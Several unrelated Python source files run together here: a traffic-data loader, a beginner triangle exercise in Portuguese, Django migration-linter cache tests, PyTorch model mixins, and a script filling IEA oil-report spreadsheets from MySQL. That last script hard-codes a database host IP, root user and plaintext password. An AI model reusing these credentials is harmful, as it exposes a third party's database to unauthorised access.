XC = np.stack(XC, axis=0)
return XC, timestamps_Y
def load_stdata(fname):
f = h5py.File(fname, 'r')
data = f['data'].value
timestamps = f['date'].value
f.close()
return data, timestamps
def stat(fname):
def get_nb_timeslot(f):
s = f['date'][0]
e = f['date'][-1]
year, month, day = map(int, [s[:4], s[4:6], s[6:8]])
ts = time.strptime("%04i-%02i-%02i" % (year, month, day), "%Y-%m-%d")
year, month, day = map(int, [e[:4], e[4:6], e[6:8]])
te = time.strptime("%04i-%02i-%02i" % (year, month, day), "%Y-%m-%d")
nb_timeslot = (time.mktime(te) - time.mktime(ts)) / (0.5 * 3600) + 48
ts_str, te_str = time.strftime("%Y-%m-%d", ts), time.strftime("%Y-%m-%d", te)
return nb_timeslot, ts_str, te_str
with h5py.File(fname, 'r') as f:
nb_timeslot, ts_str, te_str = get_nb_timeslot(f)
nb_day = int(nb_timeslot / 48)
mmax = f['data'].value.max()
mmin = f['data'].value.min()
stat = '=' * 5 + 'stat' + '=' * 5 + '\n' + \
'data shape: %s\n' % str(f['data'].shape) + \
'# of days: %i, from %s to %s\n' % (nb_day, ts_str, te_str) + \
'# of timeslots: %i\n' % int(nb_timeslot) + \
'# of timeslots (available): %i\n' % f['date'].shape[0] + \
'missing ratio of timeslots: %.1f%%\n' % ((1. - float(f['date'].shape[0] / nb_timeslot)) * 100) + \
'max: %.3f, min: %.3f\n' % (mmax, mmin) + \
'=' * 5 + 'stat' + '=' * 5
print(stat)
class MinMaxNormalization(object):
'''MinMax Normalization --> [-1, 1]
x = (x - min) / (max - min).
x = x * 2 - 1
'''
def __init__(self):
pass
def fit(self, X):
self._min = X.min()
self._max = X.max()
print("min:", self._min, "max:", self._max)
def transform(self, X):
X = 1. * (X - self._min) / (self._max - self._min)
# X = X * 2. - 1.
return X
def fit_transform(self, X):
self.fit(X)
return self.transform(X)
def inverse_transform(self, X):
X = (X + 1.) / 2.
X = 1. * X * (self._max - self._min) + self._min
return X
def timestamp2vec(timestamps):
# tm_wday range [0, 6], Monday is 0
# vec = [time.strptime(str(t[:8], encoding='utf-8'), '%Y%m%d').tm_wday for t in timestamps] # python3
vec = [time.strptime(t[:8], '%Y%m%d').tm_wday for t in timestamps] # python2
ret = []
for i in vec:
v = [0 for _ in range(7)]
v[i] = 1
if i >= 5:
v.append(0) # weekend
else:
v.append(1) # weekday
ret.append(v)
return np.asarray(ret)
def remove_incomplete_days(data, timestamps, T=48):
# remove a certain day which has not 48 timestamps
days = [] # available days: some day only contain some seqs
days_incomplete = []
i = 0
while i < len(timestamps):
if int(timestamps[i][8:]) != 1:
i += 1
elif i+T-1 < len(timestamps) and int(timestamps[i+T-1][8:]) == T:
days.append(timestamps[i][:8])
i += T
else:
days_incomplete.append(timestamps[i][:8])
i += 1
print("incomplete days: ", days_incomplete)
days = set(days)
idx = []
for i, t in enumerate(timestamps):
if t[:8] in days:
idx.append(i)
data = data[idx]
timestamps = [timestamps[i] for i in idx]
return data, timestamps
class InputHandle:
def __init__(self, datas, indices, input_param):
self.name = input_param['name']
self.input_data_type = input_param.get('input_data_type', 'float32')
self.minibatch_size = input_param['minibatch_size']
self.image_width = input_param['image_width']
self.datas = datas
self.indices = indices
self.current_position = 0
self.current_batch_indices = []
self.current_input_length = input_param['seq_length']
def total(self):
return len(self.indices)
def begin(self, do_shuffle=True):
logger.info("Initialization for read data ")
if do_shuffle:
random.shuffle(self.indices)
self.current_position = 0
self.current_batch_indices = self.indices[self.current_position:self.current_position + self.minibatch_size]
def next(self):
self.current_position += self.minibatch_size
if self.no_batch_left():
return None
self.current_batch_indices = self.indices[self.current_position:self.current_position + self.minibatch_size]
def no_batch_left(self):
if self.current_position + self.minibatch_size >= self.total():
return True
else:
return False
def get_batch(self):
if self.no_batch_left():
logger.error(
"There is no batch left in " + self.name + ". Consider to user iterators.begin() to rescan from the beginning of the iterators")
return None
input_batch = self.datas[self.current_batch_indices, :, :, :]
input_batch = input_batch.astype(self.input_data_type)
return input_batch
def print_stat(self):
logger.info("Iterator Name: " + self.name)
logger.info(" current_position: " + str(self.current_position))
logger.info(" Minibatch Size: " + str(self.minibatch_size))
logger.info(" total Size: " + str(self.total()))
logger.info(" current_input_length: " + str(self.current_input_length))
logger.info(" Input Data Type: " + str(self.input_data_type))
class DataProcess:
def __init__(self, input_param):
self.paths = input_param['paths']
self.image_width = input_param['image_width']
self.input_param = input_param
self.seq_len = input_param['seq_length']
self.train_data, self.test_data, _, _, _ = self.load_data(self.paths, len_closeness=input_param['seq_length'])
self.train_indices = list(range(self.train_data.shape[0]))
self.test_indices = list(range(self.test_data.shape[0]))
def load_data(self, datapath, T=48, nb_flow=2, len_closeness=None, len_test=48 * 7 * 4):
"""
"""
assert (len_closeness > 0)
# load data
# 13 - 16
data_all = []
timestamps_all = list()
for year in range(13, 17):
fname = os.path.join(
datapath[0], 'BJ{}_M32x32_T30_InOut.h5'.format(year))
print("file name: ", fname)
stat(fname)
data, timestamps = load_stdata(fname)
# print(timestamps)
# remove a certain day which does not have 48 timestamps
data, timestamps = remove_incomplete_days(data, timestamps, T)
data = data[:, :nb_flow]
data[data < 0] = 0.
data_all.append(data)
timestamps_all.append(timestamps)
print("\n")
# minmax_scale
data_train = np.vstack(copy(data_all))[:-len_test]
print('train_data shape: ', data_train.shape)
mmn = MinMaxNormalization()
mmn.fit(data_train)
data_all_mmn = [mmn.transform(d) for d in data_all]
XC = []
timestamps_Y = []
for data, timestamps in zip(data_all_mmn, timestamps_all):
# instance-based dataset --> sequences with format as (X, Y) where X is
# a sequence of images and Y is an image.
st = STMatrix(data, timestamps, T, CheckComplete=False)
_XC, _timestamps_Y = st.create_dataset(len_closeness=len_closeness)
XC.append(_XC)
timestamps_Y += _timestamps_Y
XC = np.concatenate(XC, axis=0)
print("XC shape: ", XC.shape)
XC_train = XC[:-len_test]
XC_test = XC[-len_test:]
timestamp_train, timestamp_test = timestamps_Y[:-len_test], timestamps_Y[-len_test:]
X_train = XC_train
X_test = XC_test
print('train shape:', XC_train.shape,
'test shape: ', XC_test.shape)
return X_train, X_test, mmn, timestamp_train, timestamp_test
def get_train_input_handle(self):
return InputHandle(self.train_data, self.train_indices, self.input_param)
def get_test_input_handle(self):
return InputHandle(self.test_data, self.test_indices, self.input_param)
|
# Teste seu código aos poucos. Não teste tudo no final, pois fica mais difícil de identificar erros.
# Ao testar sua solução, não se limite ao caso de exemplo. Teste as diversas possibilidades de saída
a=float(input("Lado 1: "))
b=float(input("Lado 2: "))
c=float(input("Lado 3: "))
print("Entradas:" , a,",",b,",",c)
if ((a>=b+c)or(b>=a+c)or(c>=a+b)):
print("Tipo de triangulo: invalido")
else:
if((a==b)and(b==c)):
print("Tipo de triangulo: equilatero")
else:
if((a == b)or(a == c)or(b == c)):
print("Tipo de triangulo: isosceles")
else:
print("Tipo de triangulo: escaleno")
|
# Copyright 2019 3YOURMIND GmbH
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import unittest
import sys
from tests import fixtures
from django_migration_linter import MigrationLinter, Cache, DEFAULT_CACHE_PATH
if sys.version_info >= (3, 3):
import unittest.mock as mock
else:
import mock
class CacheTest(unittest.TestCase):
MIGRATION_FILE = os.path.join(fixtures.ALTER_COLUMN_PROJECT, 'test_app', 'migrations', '0001_initial.py')
def test_cache_normal(self):
cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_add_not_null_column.pickle')
if os.path.exists(cache_file):
os.remove(cache_file)
linter = MigrationLinter(fixtures.ADD_NOT_NULL_COLUMN_PROJECT)
with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql)as sql_mock:
linter.lint_all_migrations()
self.assertEqual(sql_mock.call_count, 2)
cache = Cache(
fixtures.ADD_NOT_NULL_COLUMN_PROJECT,
DEFAULT_CACHE_PATH
)
cache.load()
self.assertEqual(cache['3ef74e7f3e53e273e2fc95379248d58d']['result'], 'OK')
self.assertEqual(cache['e1e312b6d08ecbe017c25c58fc2be257']['result'], 'ERR')
self.assertListEqual(
cache['e1e312b6d08ecbe017c25c58fc2be257']['errors'],
[{'err_msg': 'RENAMING tables', 'code': 'RENAME_TABLE', 'table': None, 'column': None}]
)
# Start the Linter again -> should use cache now.
linter = MigrationLinter(fixtures.ADD_NOT_NULL_COLUMN_PROJECT)
with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
linter.lint_all_migrations()
self.assertEqual(sql_mock.call_count, 0)
self.assertTrue(linter.has_errors)
def test_cache_ignored(self):
cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_ignore_migration.pickle')
if os.path.exists(cache_file):
os.remove(cache_file)
linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT)
with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
linter.lint_all_migrations()
self.assertEqual(sql_mock.call_count, 2)
cache = Cache(
fixtures.IGNORE_MIGRATION_PROJECT,
DEFAULT_CACHE_PATH
)
cache.load()
self.assertEqual(cache['63230606af0eccaef7f1f78c537c624c']['result'], 'OK')
self.assertEqual(cache['5c5ca1780a9f28439c1defc1f32af894']['result'], 'IGNORE')
# Start the Linter again -> should use cache now.
linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT)
with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
linter.lint_all_migrations()
self.assertEqual(sql_mock.call_count, 0)
def test_cache_ignored_command_line(self):
cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_ignore_migration.pickle')
if os.path.exists(cache_file):
os.remove(cache_file)
linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT,
ignore_name_contains='0001')
with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
linter.lint_all_migrations()
self.assertEqual(sql_mock.call_count, 1)
cache = Cache(
fixtures.IGNORE_MIGRATION_PROJECT,
DEFAULT_CACHE_PATH
)
cache.load()
self.assertNotIn('63230606af0eccaef7f1f78c537c624c', cache)
self.assertEqual(cache['5c5ca1780a9f28439c1defc1f32af894']['result'], 'IGNORE')
def test_cache_modified(self):
cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_alter_column.pickle')
if os.path.exists(cache_file):
os.remove(cache_file)
linter = MigrationLinter(fixtures.ALTER_COLUMN_PROJECT)
linter.lint_all_migrations()
cache = Cache(
fixtures.ALTER_COLUMN_PROJECT,
DEFAULT_CACHE_PATH
)
cache.load()
self.assertEqual(cache['8589aa107b6da296c4b49cd2681d2230']['result'], 'OK',
'If this fails, tearDown might have failed to remove '
'the modification from tests/test_project_fixtures/'
'test_project_alter_column/test_app/migrations/0001_initial.py'
)
self.assertEqual(cache['8f54c4a434cfaa9838e8ca12eb988255']['result'], 'ERR')
self.assertListEqual(
cache['8f54c4a434cfaa9838e8ca12eb988255']['errors'],
[{u'err_msg': u'ALTERING columns (Could be backward compatible. '
u'You may ignore this migration.)',
u'code': u'ALTER_COLUMN',
u'table': u'test_app_a',
u'column': None}
]
)
# Modify migration
backup_migration_file = self.MIGRATION_FILE + "_backup"
shutil.copy2(self.MIGRATION_FILE, backup_migration_file)
with open(self.MIGRATION_FILE, "a") as f:
f.write("# modification at the end of the file")
# Start the Linter again -> Cache should look different now
linter = MigrationLinter(fixtures.ALTER_COLUMN_PROJECT)
linter.lint_all_migrations()
cache = Cache(
fixtures.ALTER_COLUMN_PROJECT,
DEFAULT_CACHE_PATH
)
cache.load()
shutil.copy2(backup_migration_file, self.MIGRATION_FILE)
os.remove(backup_migration_file)
self.assertNotIn('8589aa107b6da296c4b49cd2681d2230', cache)
self.assertEqual(cache['fbee628b1ab4bd1c14f8a4b41123e7cf']['result'], 'OK')
|
from collections import OrderedDict
from copy import deepcopy
import numpy as np
import torch
from torch import nn
from utils.io import make_path
class MLFeatures:
__RequiredTarget__: OrderedDict
__IgnoreSuffix__: str = '__'
_model_callbacks: nn.ModuleDict
_model_kwargs: OrderedDict
_model_type_callbacks: OrderedDict
_optim_callbacks: OrderedDict
_param_groups: OrderedDict
@property
def model_callbacks(self):
return self._model_callbacks
class ModelCallbacks(MLFeatures):
def init_model_callbacks(self, model_kwargs, **kwargs):
# Model Initialization
model_names = model_kwargs.keys()
model_types, init_kwargs = zip(*model_kwargs.values())
missing_callbacks = set(self.__RequiredTarget__.keys()) - set(model_names)
if len(missing_callbacks) > 0:
RuntimeError('Model initialization failed, missing model_callbacks {}'.format(missing_callbacks))
self._model_callbacks = nn.ModuleDict()
self._model_kwargs = OrderedDict(zip(model_names, init_kwargs))
self._model_type_callbacks = OrderedDict(zip(model_names, model_types))
def _init_models(self, update_keys=None):
if update_keys is None:
update_keys = self._model_callbacks.keys()
update_list = []
for name in update_keys:
model_arch = self._model_type_callbacks[name]
init_kwargs = self._model_kwargs.get(name)
if init_kwargs is None:
init_kwargs = {}
model = model_arch(**init_kwargs)
update_list.append((name, model))
if self.__RequiredTarget__[name]:
target_model = deepcopy(model)
for p in target_model.parameters():
p.requires_grad = False
update_list.append((name + self.__IgnoreSuffix__, target_model))
self._model_callbacks.update(update_list)
del update_list
def train(self, mode=True):
self._model_callbacks.train(mode)
def eval(self):
self.train(mode=False)
def load_models(self, path, **kwargs):
for key, model in self._model_callbacks.items():
model.load_state_dict(torch.load('{}/{}.pt'.format(path, key)))
print('Models loaded successfully')
def save_models(self, path, **kwargs):
make_path(path)
for key, model in self._model_callbacks.items():
torch.save(model.state_dict(), '{}/{}.pt'.format(path, key))
print('Models saved successfully')
class ParamGroupCallbacks(MLFeatures):
def init_param_groups(self, unique_optim_kwargs=None):
if unique_optim_kwargs:
self._param_groups = OrderedDict(unique_optim_kwargs)
else:
self._param_groups = OrderedDict()
for key, model in self._model_callbacks.items():
if key.endswith(self.__IgnoreSuffix__):
continue
self._param_groups.setdefault(key, {}) # Ensure every required key has a dict
self._param_groups[key].update(params=model.parameters())
class Memory:
# TODO Make it into Mixin
@classmethod
def init_memory(cls, observation_spaces, memory_size, **kwargs):
# Scene Memory for Agent - (Building, Time, Std_Observation)
# Reward Memory for Agent - (Building, Time)
state_example = observation_spaces[:, None].repeat(memory_size, 1)
lead_dim = state_example.shape[:-1]
cls.state_memory = np.zeros_like(state_example, dtype=np.float32) # Save as double-precision for preprocess
cls.reward_memory = np.zeros(lead_dim, dtype=np.float32) # TODO Reward Dim?
cls.valid_mask = np.zeros(lead_dim, dtype=np.bool)
def update_state_memory(self, state):
# separate adding state memory from _encoder_state (which is called by select_action)
axis = 1
state, time_length = self._check_time_dim(state, self.state_memory, axis=axis)
self.update_memory(state, self.state_memory, axis=axis, copy=False)
self.update_memory(np.ones(time_length, dtype=np.bool), self.valid_mask, axis=axis, copy=False)
@staticmethod
def update_memory(data: np.ndarray, memory: np.ndarray, axis=0, copy=True):
# TODO
if copy:
memory = np.copy(memory)
data, time_length = Memory._check_time_dim(data, memory, axis=axis)
old_memory, new_memory = np.split(memory, [-time_length], axis=axis)
old_memory[:] = np.split(memory, [time_length], axis=axis)[1]
new_memory[:] = data
return memory
@staticmethod
def _check_time_dim(data, memory, axis=0):
data = np.asarray(data)
if data.ndim == memory.ndim-1:
data = np.copy(data)
data = np.expand_dims(data, axis)
assert data.ndim == memory.ndim
return data, data.shape[axis]
|
"""
Django settings sans boilerplate
"""
from .functions import emplace, setenv
__all__ = ['emplace', 'setenv']
|
import mysql.connector
from mysql.connector import Error
from openpyxl import load_workbook
from openpyxl.styles import Alignment, Protection, Font
#To load workbook
wb = load_workbook('./AugustReport/July2019IEAReport.xlsx')
print(wb.get_sheet_names())
anotherSheet = wb.active
# try:
# sheet = wb.get_sheet_by_name('Annual_Previous')
# wb.remove_sheet(sheet)
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# except Exception as e:
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# try:
# sheet = wb.get_sheet_by_name('Quarter_Previous')
# wb.remove_sheet(sheet)
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Quarter_Previous'
# except Exception as e:
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = "Quarter_Previous"
# pass
wb.save('./July2019IEAReport.xlsx')
#to find row number of OECD,NONOOECD,TOTALOECD,TOTALNONOECD
def fetch_excel(sheet):
print(sheet)
flag = 0
mbd = -1
fetch = {}
match_fetch={}
sheet = wb.get_sheet_by_name(sheet)
max_col = (sheet.max_column)
print(max_col)
max_row = (sheet.max_row)
print(max_row)
for row in range(1,max_row):
row_ex = 'A'+str(row)
if sheet[row_ex].value == 'Demand':
fetch['Demand'] = row
match_fetch['Demand'] = row
row = row + 1
row_ex = 'A' + str(row)
if sheet[row_ex].value == 'OECD':
match_fetch['DemandOECD'] = row
row = row + 1
oecd_demand = row
fetch['oecd_demand'] = oecd_demand
for total in range(row,max_row):
row_ex = 'A' + str(total)
if sheet[row_ex].value == 'Total OECD':
totaloecd_demand = total
total = total+1
print('totaloecd_demand',totaloecd_demand)
fetch['totaloecd_demand'] = totaloecd_demand
match_fetch['DemandTotal OECD'] = totaloecd_demand
break
for non in range(total,max_row):
row_ex = 'A' + str(non)
if sheet[row_ex].value == 'Non-OECD':
match_fetch['DemandNon-OECD'] = non
non = non + 1
nonoecd_demand = non
fetch['nonoecd_demand'] = nonoecd_demand
break
for total_non in range(non,max_row):
row_ex = 'A' + str(total_non)
if sheet[row_ex].value == 'Total Non-OECD':
totalnonoecd_demand = total_non
total_non = total_non + 1
fetch['totalnonoecd_demand'] = totalnonoecd_demand
match_fetch['DemandTotal Non-OECD'] = totalnonoecd_demand
break
elif sheet[row_ex].value == 'Supply':
fetch['Supply'] = row
match_fetch['Supply'] = row
row = row + 1
row_ex = 'A' + str(row)
if sheet[row_ex].value == 'OECD':
row = row + 1
oecd_supply = row
fetch['oecd_supply'] = oecd_supply
for total in range(row,max_row):
row_ex = 'A' + str(total)
if sheet[row_ex].value == 'Total OECD':
totaloecd_supply = total
total = total+1
fetch['totaloecd_supply'] = totaloecd_supply
match_fetch['SupplyTotal OECD'] = totaloecd_supply
break
for non in range(total,max_row):
row_ex = 'A' + str(non)
if sheet[row_ex].value == 'Non-OECD':
match_fetch['SupplyNon-OECD'] = non
nonoecd_supply = non
non = non + 1
fetch['nonoecd_supply'] = nonoecd_supply
break
for total_non in range(non,max_row):
row_ex = 'A' + str(total_non)
if sheet[row_ex].value == 'Total Non-OECD':
totalnonoecd_supply = total_non
total_non = total_non + 1
fetch['totalnonoecd_supply'] = totalnonoecd_supply
match_fetch['SupplyTotal Non-OECD'] = totalnonoecd_supply
break
for tot_n_opec in range(non, max_row):
row_ex = 'A' + str(tot_n_opec)
if sheet[row_ex].value == 'Total Non-OPEC Supply':
total_non_opec_supply = tot_n_opec
tot_n_opec = tot_n_opec + 1
fetch['total_non_opec_supply'] = total_non_opec_supply
match_fetch['Total Non-OPEC Supply'] = total_non_opec_supply
break
for opec in range(tot_n_opec, max_row):
row_ex = 'A' + str(opec)
if sheet[row_ex].value == 'OPEC':
match_fetch['OPEC'] = opec
opec_supply = opec
fetch['opec_supply'] = opec_supply
opec = opec + 1
break
for tot_opec in range(opec, max_row):
row_ex = 'A' + str(tot_opec)
if sheet[row_ex].value == 'Total OPEC':
total_opec_supply = tot_opec
fetch['total_opec_supply'] = total_opec_supply
match_fetch['Total OPEC'] = total_opec_supply
tot_opec = tot_opec + 1
break
elif sheet[row_ex].value == 'Stocks':
row = row + 1
row_ex = 'A' + str(row)
if sheet[row_ex].value == 'Government Controlled':
stock_govt = row
print('stock_gov',stock_govt)
for sto_oecd in range(stock_govt,max_row):
row_ex = 'A' + str(sto_oecd)
if sheet[row_ex].value == 'OECD':
oecd_stock = sto_oecd+1
fetch['oecd_stock'] = oecd_stock
break
elif sheet[row_ex].value == 'Industry Stocks':
idstock = row
row = row + 1
for ioecd in range(row, max_row):
row_ex = 'A' + str(ioecd)
if sheet[row_ex].value == 'OECD':
ioecd_stock = ioecd+1
fetch['ioecd_stock'] = ioecd_stock
print('ioecd_stock', ioecd_stock)
if (sheet[row_ex].value == 'CHANGE - MBD'):
mbd = ioecd
print('CHANGE - MBD', row_ex)
break
#important condition to limit the row
if (mbd == row):
break
return fetch,match_fetch
#
# #
# #
# #Database Connection
try:
connection = mysql.connector.connect(host='13.229.23.103',
database='Aletheia',
user='root',
password='AP@2019capio!')
if connection.is_connected():
db_Info = connection.get_server_info()
print("Connected to MySQL database... MySQL Server version on ", db_Info)
cursor = connection.cursor(buffered=True)
cursor.execute("select database();")
record = cursor.fetchone()
print("Your connected to - ", record)
def callproc_script():
try:
cursor.callproc('DP_IEAReportDataPopulation')
for result in cursor.stored_results():
print(result.fetchone())
except Error as e:
print("print", e)
# #dynamically access Regions and Countries
def regions(sheet):
print(sheet)
# wb.create_sheet(sheet)
sheet = wb.get_sheet_by_name(sheet)
max_col = (sheet.max_column)
max_row = (sheet.max_row) + 1
print(max_col) #
# # print(max_row)
flag = 1
nonoced = 0
# font = Font(name='Calibri',size = 11,bold = True)
gr_demand = ['OECD', 'Non-OECD']
gr_supply = ['Non-OPEC-OECD', 'Non-OPEC-Non-OECD']
try:
for groups in gr_demand:
if flag == 1:
rows = 10
sheet.cell(row=9, column=1).value = 'Demand'
for row in range(rows, max_row):
row_ex = 'A' + str(row)
if sheet[row_ex].value == 'Demand':
row = row + 1
sheet.cell(row=row, column=1).value = groups
sheet.cell(row=row, column=1).font = Font(bold=True)
rows = row + 1
break
elif flag == 2:
rows = nonoced
sheet.cell(row=rows, column=1).value = groups
sheet.cell(row=rows, column=1).font = Font(bold=True)
rows = rows + 1
else:
pass
cursor.execute(
"SELECT distinct RegionName FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = %s",
(groups,))
result = cursor.fetchall()
row = row + 1
for value in result:
row = row + 1
# print(row)
val = value[0]
sheet.cell(row=row, column=1).value = val
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=True)
cursor.execute(
"select distinct Country from ReportFor2b where RegionName = %s and Gropus = %s", (val,groups,))
result_country = cursor.fetchall()
for value in result_country:
row = row + 1
print(value[0])
sheet.cell(row=row, column=1).value = value[0]
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=False)
sheet.cell(row=row, column=1).value = 'Total' + groups
sheet.cell(row=row, column=1).font = Font(bold=True)
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
nonoced = row + 1
flag = 2
print(row)
row = row + 1
sheet.cell(row=row, column=1).value = ' '
row = row + 1
sheet.cell(row=row, column=1).value = 'Supply'
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=True)
flag = 1
for groups in gr_supply:
if flag == 1:
rows = row
for row in range(rows, max_row):
row_ex = 'A' + str(row)
if sheet[row_ex].value == 'Supply':
row = row + 1
sheet.cell(row=row, column=1).value = groups
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0,
wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=True)
rows = row + 1
break
elif flag == 2:
rows = nonoced
sheet.cell(row=rows, column=1).value = groups
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=True)
else:
pass
cursor.execute(
"SELECT distinct RegionName FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = %s",
(groups,))
result = cursor.fetchall()
for value in result:
row = row + 1
# print(row)
val = value[0]
sheet.cell(row=row, column=1).value = val
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
sheet.cell(row=row, column=1).font = Font(bold=True)
cursor.execute(
"select distinct Country from ReportFor3 where RegionName = %s and Groups = %s ", (val,groups,))
result_country = cursor.fetchall()
for value in result_country:
row = row + 1
print(value[0])
sheet.cell(row=row, column=1).value = value[0]
sheet.cell(row=row, column=1).font = Font(bold=False)
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
sheet.cell(row=row, column=1).value = 'Total' + groups.replace('Non-OPEC-', '')
sheet.cell(row=row, column=1).font = Font(bold=True)
nonoced = row
flag = 2
print(row)
row = row + 1
sheet.cell(row=row, column=1).value = 'Processing gains'
row = row + 1
sheet.cell(row=row, column=1).value = 'Global Biofuels'
row = row + 1
sheet.cell(row=row, column=1).value = 'Total Non-OPEC Supply'
sheet.cell(row=row, column=1).font = Font(bold=True)
row = row + 1
sheet.cell(row=row, column=1).value = 'Non-OPEC: Historical Composition'
sheet.cell(row=row, column=1).font = Font(bold=True)
row = row + 1
sheet.cell(row=row, column=1).value = ''
row = row + 1
sheet.cell(row=row, column=1).value = 'OPEC'
sheet.cell(row=row, column=1).font = Font(bold=True)
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=0, wrap_text=True)
if sheet.cell(row=row, column=1).value == 'OPEC':
print("OPECCCCCCCCCCCCCCCC")
cursor.execute(
"SELECT distinct Country FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'OPEC'")
result = cursor.fetchall()
for value in result:
print(value[0])
row = row + 1
sheet.cell(row=row, column=1).value = value[0]
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=2, wrap_text=True)
sheet.cell(row=row, column=1).value = 'Crude'
sheet.cell(row=row, column=1).alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
row = row + 1
sheet.cell(row=row, column=1).value = 'NGL'
row = row + 1
sheet.cell(row=row, column=1).value = 'Total OPEC'
row = row + 1
sheet.cell(row=row, column=1).font = Font(bold=True)
sheet.cell(row=row, column=1).value = 'OPEC: Historical Composition'
sheet.cell(row=row, column=1).font = Font(bold=True)
row = row + 1
sheet.cell(row=row, column=1).value = 'Total Supply'
sheet.cell(row=row, column=1).font = Font(bold=True)
row = row + 1
except Error as e:
print("print", e)
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
def quarter_data():
# try:
# sheet = wb.get_sheet_by_name('Quarter_Previous')
# wb.remove_sheet(sheet)
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Quarter_Previous'
# wb.remove_sheet(sheet)
# except Exception as e:
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Quarter_Previous'
# wb.remove_sheet(sheet)
#
# region = regions('Quarter')
fetch = fetch_excel('Quarter')
fetch = fetch[0]
sheet = wb.get_sheet_by_name('Quarter')
max_col = (sheet.max_column)
print(max_col)
max_row = (sheet.max_row)
# reporteddate = '00:00:00
try:
#
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-4Q'):
# break
# totaloecd_demand = int(fetch.get('totaloecd_demand')) + 1
# oecd_demand = int(fetch.get('oecd_demand'))
# for row in range(oecd_demand, totaloecd_demand):
# row_ex = 'A' + str(row)
# if (period == '2025-4Q'):
# flag = 1
# break
# else:
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Regionname = %s and ReportedDate like '2019-02-13%'",
# (period, region,))
# result = cursor.fetchall()
# if result and len(result) >0:
# val = result[0][0]
# if ('Q' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=1, vertical='bottom',
# wrap_text=True)
#
# else:
# country = sheet[row_ex].value
# print(country)
# cursor.execute(
# "SELECT value FROM ReportFor2b WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Country = %s and ReportedDate like '2019-02-13%'",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# if ('Q' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
#
# else:
# pass
# if sheet[row_ex].value == 'Total OECD':
# # print("total oecds")
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and ReportedDate like '2019-02-13%' and Regionname IS NULL",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# if ('Q' in period):
# for val in result:
# sheet.cell(row=row, column=col).value = val
# #
# # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-4Q'):
# break
# # #for demand and nonoecd #
# totalnonoecd_demand = int(fetch.get('totalnonoecd_demand')) + 2
# #for total demand
# nonoecd_demand = int(fetch.get('nonoecd_demand'))
# for non in range(nonoecd_demand, totalnonoecd_demand):
# row_ex = 'A' + str(non)
# if sheet[row_ex].value == 'Total Non-OECD':
